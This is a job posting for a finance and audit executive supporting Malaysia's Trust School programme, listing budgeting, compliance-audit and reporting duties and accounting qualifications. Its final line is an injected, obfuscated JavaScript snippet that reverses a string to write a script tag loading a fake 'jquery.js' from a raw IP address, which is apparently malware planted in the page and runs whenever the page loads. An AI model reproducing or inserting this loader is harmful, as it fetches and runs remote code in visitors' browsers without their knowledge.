Location : Maluri, Cochrane, Brickfields
Industry : Education
Terms : 2 year contract, renewable
Responsible to the Finance Manager and supervised by TS Senior Finance Executive to assist school in the transformation process of the Trust School Program.
(A) Finance & Accounting, Procurement, Inventory and Asset Management
1. Analyse existing systems & processes in the school – i.e. through observation, desk analysis, interview, walkthrough, sample testing, compliance checklist based on existing MOE Guidelines.
2. Monitor, perform audit and report audit findings on compliance to the policies, procedures and guidelines – as per MOE Guidelines including related Circular and Treasury guidelines (Arahan Perbendaharaan).
3. Identify further weaknesses and recommend further improvements and training required (may be involved in delivering structured training or on the job training as needed).
4. Follow up and ensure all recommended action items are taken, until the issues are resolved and/or the weakness areas are improved.
5. Assist the School Leadership Team “(SLT)” to drive the relevant Finance Clerk (Pembantu Tadbir Kewangan) – “(PTK)” / Chief Financial Officer (Ketua Pembantu Tadbir) – “(KPT)” to take ownership of school finance & accounting, procurement, inventory and asset management.
6. Support the planning and implementation of yearly audit programme by the School’s Internal Auditor.
(B) Budgeting and Financial Planning
1. To monitor and review the budget report prepared by SLTs, KPT and PTK as for the followings:-
– 2-Year Budget (to MOE)
– Yearly/Quarterly Revised Budget (Pelarasan) (to MOE)
– School detailed monthly budget
2. To assist the SLT to ensure that the PT / KPT is actively involved in the Implementation the financial budgeting process with the school ensuring that the objectives of the TSIP and Key Performance Targets are addressed in the budget.
3. Act as a change agent to assist the School Leadership Team, Department Heads, Subject Heads and relevant PTK / KPT to take ownership (identify budget owners for each budget items) of school operational and educational budgets that are linked to TSIP, with the aim to achieve the Key Performance Target of the Trust School.
4. To assist the SLT to ensure that all budgets are to be done on a monthly spread. On accumulative quarterly basis, School Operating Expenditure (Anggaran Belanja Mengurus) “(ABM)”and Per Capita Grant “(PCG)” budgets are to be spent
according to MOE recommendation and guidelines.
5. To check and audit monthly accounting records and report on budget vs actual variance analysis.
6. To identify major variances, seek justification of the variances from respective budget owners and recommend appropriate follow up actions (ensure that the follow up actions are to be taken and resolved by the next quarter).
This job description is subject to change to be in line and according with the business
(C) Other Responsibilities and Duties:
1. As part of the operations team in the cluster, to assist the capture, collation and analysis of the Students & teachers Attendance.
2. Escalate and timely reporting to Yayasan Amir (YA) on financial-related issues. Follow up on necessary actions to be taken until the issues are resolved.
3. Promote and adhere to the Company’s Vision and Values at all times.
4. Maintain high commitment to quality, positive attitude, accountability and enthusiasm at all times.
5. Observe culturally sensitive and appropriate behavior, dress codes and language at all times.
6. Any other job that requested by the Superior, Line Manager and General Manager (Finance).
– Possess a Bachelor’s degree in Accountancy.
– Minimum 3-5 years of experience in handling full sets of accounts, budgeting and liaising with external auditors, tax and bankers with some experience in the Education industry.
– Excellent communication skills (able to speak well in Bahasa Malaysia and English);
– All Microsoft packages, especially Microsoft Excel, Word and Power Point. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))